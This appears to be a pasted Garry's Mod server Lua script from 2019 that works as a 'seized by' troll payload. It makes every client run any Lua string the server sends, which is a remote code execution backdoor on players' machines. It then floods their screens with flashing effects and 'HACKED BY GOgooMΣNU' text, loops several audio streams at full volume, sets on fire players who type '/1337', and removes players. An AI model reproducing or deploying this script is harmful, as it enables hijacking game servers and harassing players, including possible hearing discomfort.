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Jan 19th, 2019
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  1. util.AddNetworkString "skeleton_dancing_troll"
  3. local lol = {}
  4. function lol:RandomString( intMin, intMax )
  5. local ret = ""
  6. for _ = 1, math.random( intMin, intMax ) do
  7. ret = ret.. string.char( math.random(65, 90) )
  8. end
  10. return ret
  11. end
  13. lol.m_tblActions = {}
  14. lol.m_strImageGlobalVar = lol:RandomString( 6, 12 )
  15. lol.m_strImageLoadHTML = [[<style type="text/css"> html, body {background-color: transparent;} html{overflow:hidden; ]].. (true and "margin: -8px -8px;" or "margin: 0px 0px;") ..[[ } </style><body><img src="]] .. "%s" .. [[" alt="" width="]] .. "%i"..[[" height="]] .. "%i" .. [[" /></body>]]
  17. function lol:PushAction( intChainDelay, func )
  18. self.m_tblActions[#self.m_tblActions +1] = { intChainDelay, func }
  19. end
  21. function lol:NextAction( pPlayer )
  22. pPlayer.m_intCurAction = pPlayer.m_intCurAction +1
  23. if not self.m_tblActions[pPlayer.m_intCurAction] then return end
  25. timer.Simple( self.m_tblActions[pPlayer.m_intCurAction][1], function()
  26. if not IsValid( pPlayer ) then return end
  27. self.m_tblActions[pPlayer.m_intCurAction][2]( pPlayer )
  28. self:NextAction( pPlayer )
  29. end )
  30. end
  32. function lol:Start( pPlayer )
  33. pPlayer.m_intCurAction = 0
  34. self:NextAction( pPlayer )
  35. end
  37. function lol:SendLua( pPlayer, strLua )
  38. net.Start( "skeleton_dancing_troll" )
  39. net.WriteString( strLua )
  40. net.Send( pPlayer )
  41. end
  43. function lol:SetupPlayer( pPlayer )
  44. pPlayer:SendLua( "net.Receive(\"skeleton_dancing_troll\", function() RunString(net.ReadString()) end)" )
  45. end
  47. for k, v in pairs( player.GetAll() ) do
  48. lol:SetupPlayer( v )
  49. timer.Simple( 2, function() lol:Start( v ) end )
  50. end
  52. hook.Add( "PlayerAuthed", "wat", function( pPlayer )
  53. lol:SetupPlayer( pPlayer )
  54. timer.Simple( 10, function() lol:Start( pPlayer ) end )
  55. end )
  57. hook.Add( "PlayerSay", "1337command", function( pSender, strText, bTeamChat )
  58. if strText:sub( 1, 5 ) == "/1337" then
  59. pSender:Ignite( 1e9 )
  60. pSender:ChatPrint( "Nop" )
  61. pSender:SendLua( [[surface.PlaySound( "vo/npc/male01/hacks01.wav" )]] )
  62. return false
  63. end
  64. end )
  66. --Disco time
  67. lol:PushAction( 0, function( pPlayer )
  68. local idx = pPlayer:EntIndex()
  69. timer.Create( "beat".. idx, 0.42, 0, function()
  70. if not IsValid( pPlayer ) then timer.Destroy( "beat".. idx ) return end
  71. pPlayer:ViewPunch( Angle(math.Rand(-15, -10), math.Rand(-10, 10), 0) )
  72. end )
  74. lol:SendLua( pPlayer, [[
  75. local emitter = ParticleEmitter( LocalPlayer():GetPos() )
  76. local time = 0
  78. hook.Add( "Think", "wat", function()
  79. if CurTime() < time then
  80. return
  81. end
  83. time = CurTime() +0.05
  84. for i = 1, 16 do
  85. local part = emitter:Add(
  86. "particles/balloon_bit",
  87. LocalPlayer():GetPos() +Vector(
  88. math.random( -256, 256 ),
  89. math.random( -256, 256 ),
  90. 256
  91. )
  92. )
  94. if part then
  95. local Size = math.random( 4, 7 )
  97. part:SetColor( math.random(0, 255), math.random(0, 255), math.random(0, 255), 255 )
  98. part:SetVelocity( Vector( 40, 25, -math.random(300, 400) ) )
  99. part:SetDieTime( 4.5 )
  100. part:SetGravity( Vector(40, 0, -250) )
  101. part:SetLifeTime( 0 )
  102. part:SetStartSize( Size /2 )
  103. part:SetEndSize( Size )
  104. part:SetCollide( true )
  105. end
  106. end
  107. end )
  108. ]] )
  110. lol:SendLua( pPlayer, [[
  111. hook.Add( "RenderScreenspaceEffects", "wat", function()
  112. local sinScaler = math.sin( CurTime() )
  113. DrawBloom(
  114. 0,
  115. 3,
  116. sinScaler *math.Rand(1, 8),
  117. sinScaler *math.Rand(1, 8),
  118. 6,
  119. math.Rand(0.5, 2),
  120. math.Rand(0, 0.3),
  121. math.Rand(0, 0.3),
  122. math.Rand(0.5, 1)
  123. )
  125. DrawColorModify{
  126. ["$pp_colour_addr"] = 1,
  127. ["$pp_colour_addg"] = 0,
  128. ["$pp_colour_addb"] = 00,
  129. ["$pp_colour_brightness" ] = 0,
  130. ["$pp_colour_contrast" ] = 1,
  131. ["$pp_colour_colour" ] = 1,
  132. ["$pp_colour_mulr" ] = 0,
  133. ["$pp_colour_mulg" ] = 0,
  134. ["$pp_colour_mulb" ] = 0
  135. }
  136. end )
  138. local mdl = ClientsideModel( "models/player/zombie_classic.mdl", RENDERGROUP_BOTH )
  139. mdl:SetNoDraw( true )
  140. local posCache, time = {}, 0
  142. hook.Add( "HUDPaint", "dance", function()
  143. if not mdl.SeqStart or CurTime() > (mdl.SeqStart +mdl.SeqDuration) then
  144. local idx = mdl:LookupSequence("taunt_dance")
  145. mdl.SeqDuration = mdl:SequenceDuration( idx )
  146. mdl.SeqStart = CurTime()
  147. mdl:ResetSequence( idx )
  148. end
  150. mdl:SetCycle( (CurTime() -mdl.SeqStart) /mdl.SeqDuration )
  153. local w, h = 300, 300
  154. local ang = Angle( 0, 0, 0 )
  156. for i = 1, 32 do
  157. if CurTime() > time then
  158. posCache[i] = { math.random( 0, ScrW() -w ), math.random( 0, ScrH() -h ) }
  159. end
  160. local x, y = posCache[i][1], posCache[i][2]
  162. cam.Start3D( (ang:Forward() *64) +(ang:Up() *32), (ang:Forward()*-1):Angle(), 90, x, y, w, h )
  163. cam.IgnoreZ( true )
  164. render.SuppressEngineLighting( true )
  166. render.SetLightingOrigin( mdl:GetPos() )
  167. render.ResetModelLighting( 1, 1, 1 )
  168. render.SetColorModulation( 0, 0, 1 )
  170. mdl:DrawModel()
  172. render.SuppressEngineLighting( false )
  173. cam.IgnoreZ( false )
  174. cam.End3D()
  175. end
  177. if CurTime() > time then
  178. time = CurTime() +0.15
  179. end
  180. end )
  182. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  183. ]] )
  184. end )
  187. --EVIL TIME rip headpones
  188. lol:PushAction( 0, function( pPlayer )
  189. lol:SendLua( pPlayer, [[
  190. surface.PlaySound( "vo/npc/male01/gethellout.wav" )
  192. local sounds = {}
  193. for i = 1, 4 do
  194. sound.PlayURL( "", "noblock noplay", function( pChan )
  195. sounds[#sounds +1] = pChan
  196. end )
  197. end
  199. timer.Create( "asdf", 1, 0, function()
  200. if #sounds ~= 4 then return end
  201. timer.Destroy( "asdf" )
  202. for k, v in pairs( sounds ) do v:EnableLooping( true ) v:SetVolume( 1 ) v:Play() end
  203. end )
  205. local disco = vgui.Create("DHTML") disco:SetSize(400,400) disco:SetPos(200,0) disco:OpenURL("")
  206. local disco2 = vgui.Create("DHTML") disco2:SetSize(400,400) disco2:SetPos(ScrW()-550,0) disco2:OpenURL("")
  207. surface.CreateFont( "NEWS1", {font = "Arial",size = 70,weight = 2000,})
  208. surface.CreateFont( "NEWS2", {font = "Arial",size = 150,weight = 2000,})
  209. local newsPan1 = vgui.Create("DPanel")
  210. newsPan1:SetSize(ScrW(), 150)
  211. newsPan1:SetPos(0, ScrH()-150)
  212. newsPan1.Paint = function()
  213. surface.SetDrawColor(255,255,255,255)
  214. surface.DrawRect(0,0,newsPan1:GetWide(),newsPan1:GetTall())
  215. surface.SetDrawColor(10,190,10,255)
  216. surface.DrawRect(0,4,newsPan1:GetWide(),newsPan1:GetTall())
  217. end
  218. local newsPan2 = vgui.Create("DPanel")
  219. newsPan2:SetSize(ScrW(),ScrH())
  220. newsPan2:SetPos(0,0)
  221. newsPan2.Paint = function()
  222. local trap3 = {
  223. {x = ScrW()-504, y = ScrH()-150},
  224. {x = ScrW()-439, y = ScrH()-254},
  225. {x = ScrW(), y = ScrH()-254},
  226. {x = ScrW(), y = ScrH()-150},
  227. }
  228. local trap4 = {
  229. {x = ScrW()-500, y = ScrH()-146},
  230. {x = ScrW()-435, y = ScrH()-250},
  231. {x = ScrW(), y = ScrH()-250},
  232. {x = ScrW(), y = ScrH()-146},
  233. }
  234. local trap5 = {
  235. {x = ScrW()-475, y = ScrH()-156},
  236. {x = ScrW()-432, y = ScrH()-235},
  237. {x = ScrW()-8, y = ScrH()-235},
  238. {x = ScrW()-8, y = ScrH()-156},
  239. }
  240. draw.NoTexture()
  241. surface.SetDrawColor(255,255,255,255)
  242. surface.DrawPoly(trap3)
  243. draw.NoTexture()
  244. surface.SetDrawColor(20,200,20,255)
  245. surface.DrawPoly(trap4)
  246. draw.NoTexture()
  247. surface.SetDrawColor(10,220,10,180)
  248. surface.DrawPoly(trap5)
  249. end
  250. local title2 = vgui.Create("DLabel", newsPan2)
  251. title2:SetFont("NEWS1")
  252. title2:SetText("GOgooMΣNU | Gogo AGL ;)")
  253. title2:SizeToContents()
  254. title2:SetPos(ScrW()-title2:GetWide()-55, ScrH()-254+title2:GetTall()/2-12)
  255. title2:SetColor(Color(255,255,255))
  257. local title3 = vgui.Create("DLabel", newsPan1)
  258. title3:SetFont("NEWS2")
  259. title3:SetText("SEIZED BY GOgooMΣNU | Gogo AGL :D")
  260. title3:SizeToContents()
  261. title3:SetPos(ScrW(), 10)
  262. title3:SetColor(Color(255,255,255))
  263. timer.Create("movingtext2",.05,0,function()
  264. if title3:GetPos() >= 0-title3:GetWide() then
  265. title3:SetPos(Lerp(.5,title3:GetPos(),title3:GetPos()-10),10)
  266. else
  267. title3:SetPos(ScrW(),10)
  268. end
  269. end)
  271. surface.CreateFont( "SPAM", {font = "Arial",size = 55,weight = 2000,})
  272. local disco = vgui.Create("DHTML") disco:SetSize(400,400) disco:SetPos(200,0) disco:OpenURL("")
  273. local disco2 = vgui.Create("DHTML") disco2:SetSize(400,400) disco2:SetPos(ScrW()-550,0) disco2:OpenURL("")
  274. hook.Add( "HUDPaint", "Lines", function()
  275. local center = Vector(ScrW()/2, ScrH()/2, 0)
  276. local col = 100 for i=0, col, 1 do local rainbow = HSVToColor(CurTime() % 5 * 100 + i,1,1) surface.SetDrawColor(rainbow.r,rainbow.g,rainbow.b,255) end
  277. for i = 1,32 do surface.DrawLine(center.x,center.y, math.random(0,ScrW()), math.random(0,ScrH())) end
  278. local col = 100 for i=0, col, 1 do local rainbow = HSVToColor(CurTime() % 3 * 500 + i,1,1) surface.SetDrawColor(rainbow.r,rainbow.g,rainbow.b,255) end
  279. for i = 1,32 do surface.DrawLine(1,1, math.random(0,ScrW()), math.random(0,ScrH())) end
  280. local col = 100 for i=0, col, 1 do local rainbow = HSVToColor(CurTime() % 7 * 150 + i,1,1) surface.SetDrawColor(rainbow.r,rainbow.g,rainbow.b,255) end
  281. for i = 1,32 do surface.DrawLine(1,1, math.random(0,ScrW()), math.random(0,ScrH())) end
  282. local col = 100 for i=0, col, 1 do local rainbow = HSVToColor(CurTime() % 15 * 125 + i,1,1) surface.SetDrawColor(rainbow.r,rainbow.g,rainbow.b,255) end
  283. for i = 1,32 do surface.DrawLine(ScrW(),1, math.random(0,ScrW()), math.random(0,ScrH())) end
  284. local col = 100 for i=0, col, 1 do local rainbow = HSVToColor(CurTime() % 25 * 100 + i,1,1) surface.SetDrawColor(rainbow.r,rainbow.g,rainbow.b,255) end
  285. for i = 1,32 do surface.DrawLine(1,ScrH(), math.random(0,ScrW()), math.random(0,ScrH())) end
  286. local col = 100 for i=0, col, 1 do local rainbow = HSVToColor(CurTime() % 40 * 100 + i,1,1) surface.SetDrawColor(rainbow.r,rainbow.g,rainbow.b,255) end
  287. for i = 1,32 do surface.DrawLine(ScrW(),ScrH(), math.random(0,ScrW()), math.random(0,ScrH())) end
  288. local col = 100 for i=0, col, 1 do rainbow = HSVToColor(CurTime() % 5 * 150 + i,1,1) end
  289. local col = 100 for i=0, col, 1 do r = HSVToColor(CurTime() % 30 * 150 + i,1,1) end
  290. for i = 1,32 do draw.SimpleTextOutlined("HACKED BY GOgooMΣNU | Gogo AGL","SPAM",math.random(0,ScrW()-35), math.random(0,ScrH()-1),Color(rainbow.r,rainbow.g,rainbow.b),TEXT_ALIGN_CENTER,TEXT_ALIGN_TOP,3,Color(math.random(1,255),math.random(1,255),math.random(1,255))) end
  291. end)
  293. ]] )
  295. pPlayer:Remove()
  296. end )
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